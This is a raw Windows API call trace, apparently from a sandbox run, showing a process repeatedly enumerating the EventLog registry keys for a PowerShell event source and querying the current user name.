	[0353.181] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.181] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x330) returned 0x0
	[0353.182] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x0) returned 0x2
	[0353.182] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x334) returned 0x0
	[0353.182] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x338) returned 0x0
	[0353.182] RegCloseKey (hKey=0x338) returned 0x0
	[0353.182] RegCloseKey (hKey=0x2f0) returned 0x0
	[0353.183] RegCloseKey (hKey=0x334) returned 0x0
	[0353.467] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0353.468] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cd948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd948) returned 0x1
	[0353.469] CoTaskMemFree (pv=0x1b750480) 
	[0353.470] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0353.470] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cd988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd988) returned 1
	[0353.470] CoTaskMemFree (pv=0x40c280) 
	[0354.043] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x31c) returned 0x0
	[0354.043] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd5fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.043] CoTaskMemFree (pv=0x0) 
	[0354.043] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.043] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x0, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.043] CoTaskMemFree (pv=0x40c280) 
	[0354.043] CoTaskMemFree (pv=0x0) 
	[0354.043] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.043] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x1, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.043] CoTaskMemFree (pv=0x40c280) 
	[0354.043] CoTaskMemFree (pv=0x0) 
	[0354.043] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.043] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x2, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.043] CoTaskMemFree (pv=0x40c280) 
	[0354.043] CoTaskMemFree (pv=0x0) 
	[0354.044] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.044] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x3, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.044] CoTaskMemFree (pv=0x40c280) 
	[0354.044] CoTaskMemFree (pv=0x0) 
	[0354.044] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.044] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x4, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.044] CoTaskMemFree (pv=0x40c280) 
	[0354.044] CoTaskMemFree (pv=0x0) 
	[0354.044] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.044] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x5, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.044] CoTaskMemFree (pv=0x40c280) 
	[0354.044] CoTaskMemFree (pv=0x0) 
	[0354.044] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.044] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x6, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.044] CoTaskMemFree (pv=0x40c280) 
	[0354.044] CoTaskMemFree (pv=0x0) 
	[0354.044] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.044] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x7, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.044] CoTaskMemFree (pv=0x40c280) 
	[0354.044] CoTaskMemFree (pv=0x0) 
	[0354.044] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.044] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x8, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.044] CoTaskMemFree (pv=0x40c280) 
	[0354.044] CoTaskMemFree (pv=0x0) 
	[0354.044] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x324) returned 0x0
	[0354.045] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.045] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x328) returned 0x0
	[0354.045] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.045] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x32c) returned 0x0
	[0354.045] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.045] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x330) returned 0x0
	[0354.045] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.045] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x320) returned 0x0
	[0354.045] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.046] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x1b8) returned 0x0
	[0354.046] RegOpenKeyExW (in: hKey=0x1b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.046] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x2f4) returned 0x0
	[0354.046] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.046] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x2f8) returned 0x0
	[0354.046] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.046] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x30c) returned 0x0
	[0354.046] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x33c) returned 0x0
	[0354.046] RegCloseKey (hKey=0x33c) returned 0x0
	[0354.047] RegCloseKey (hKey=0x31c) returned 0x0
	[0354.047] RegCloseKey (hKey=0x30c) returned 0x0
	[0354.048] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x30c) returned 0x0
	[0354.048] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd5fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.048] CoTaskMemFree (pv=0x0) 
	[0354.048] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.048] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.048] CoTaskMemFree (pv=0x40c280) 
	[0354.048] CoTaskMemFree (pv=0x0) 
	[0354.048] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.048] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.048] CoTaskMemFree (pv=0x40c280) 
	[0354.048] CoTaskMemFree (pv=0x0) 
	[0354.048] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.048] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.048] CoTaskMemFree (pv=0x40c280) 
	[0354.048] CoTaskMemFree (pv=0x0) 
	[0354.048] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.048] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.048] CoTaskMemFree (pv=0x40c280) 
	[0354.048] CoTaskMemFree (pv=0x0) 
	[0354.048] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.048] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.048] CoTaskMemFree (pv=0x40c280) 
	[0354.048] CoTaskMemFree (pv=0x0) 
	[0354.048] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.048] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.049] CoTaskMemFree (pv=0x40c280) 
	[0354.049] CoTaskMemFree (pv=0x0) 
	[0354.049] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.049] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.049] CoTaskMemFree (pv=0x40c280) 
	[0354.049] CoTaskMemFree (pv=0x0) 
	[0354.049] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.049] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.049] CoTaskMemFree (pv=0x40c280) 
	[0354.049] CoTaskMemFree (pv=0x0) 
	[0354.049] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.049] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x40c280, lpcchName=0x1cd688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.049] CoTaskMemFree (pv=0x40c280) 
	[0354.049] CoTaskMemFree (pv=0x0) 
	[0354.049] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x31c) returned 0x0
	[0354.049] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.049] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x33c) returned 0x0
	[0354.049] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.050] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x340) returned 0x0
	[0354.050] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.050] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x344) returned 0x0
	[0354.050] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.050] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x348) returned 0x0
	[0354.050] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.050] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x34c) returned 0x0
	[0354.050] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.050] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x350) returned 0x0
	[0354.050] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.051] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x354) returned 0x0
	[0354.051] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x0) returned 0x2
	[0354.051] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x358) returned 0x0
	[0354.051] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6e8 | out: phkResult=0x1cd6e8*=0x35c) returned 0x0
	[0354.051] RegCloseKey (hKey=0x35c) returned 0x0
	[0354.051] RegCloseKey (hKey=0x30c) returned 0x0
	[0354.052] RegCloseKey (hKey=0x358) returned 0x0
	[0354.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x358) returned 0x0
	[0354.052] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd5cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd5cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.052] CoTaskMemFree (pv=0x0) 
	[0354.053] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.053] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.053] CoTaskMemFree (pv=0x40c280) 
	[0354.053] CoTaskMemFree (pv=0x0) 
	[0354.053] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.053] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.053] CoTaskMemFree (pv=0x40c280) 
	[0354.053] CoTaskMemFree (pv=0x0) 
	[0354.053] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.053] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.053] CoTaskMemFree (pv=0x40c280) 
	[0354.053] CoTaskMemFree (pv=0x0) 
	[0354.053] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.053] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.053] CoTaskMemFree (pv=0x40c280) 
	[0354.053] CoTaskMemFree (pv=0x0) 
	[0354.053] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.053] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.053] CoTaskMemFree (pv=0x40c280) 
	[0354.053] CoTaskMemFree (pv=0x0) 
	[0354.053] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.053] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.053] CoTaskMemFree (pv=0x40c280) 
	[0354.053] CoTaskMemFree (pv=0x0) 
	[0354.053] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.053] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.054] CoTaskMemFree (pv=0x40c280) 
	[0354.054] CoTaskMemFree (pv=0x0) 
	[0354.054] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.054] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.054] CoTaskMemFree (pv=0x40c280) 
	[0354.054] CoTaskMemFree (pv=0x0) 
	[0354.054] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0354.054] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x40c280, lpcchName=0x1cd658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0354.054] CoTaskMemFree (pv=0x40c280) 
	[0354.054] CoTaskMemFree (pv=0x0) 
	[0354.054] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x30c) returned 0x0
	[0354.054] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.054] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x35c) returned 0x0
	[0354.054] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.054] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x360) returned 0x0
	[0354.055] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.055] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x364) returned 0x0
	[0354.055] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.055] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x368) returned 0x0
	[0354.055] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.055] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x36c) returned 0x0
	[0354.055] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x0) returned 0x2
	[0354.055] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6b8 | out: phkResult=0x1cd6b8*=0x370) returned 0x0
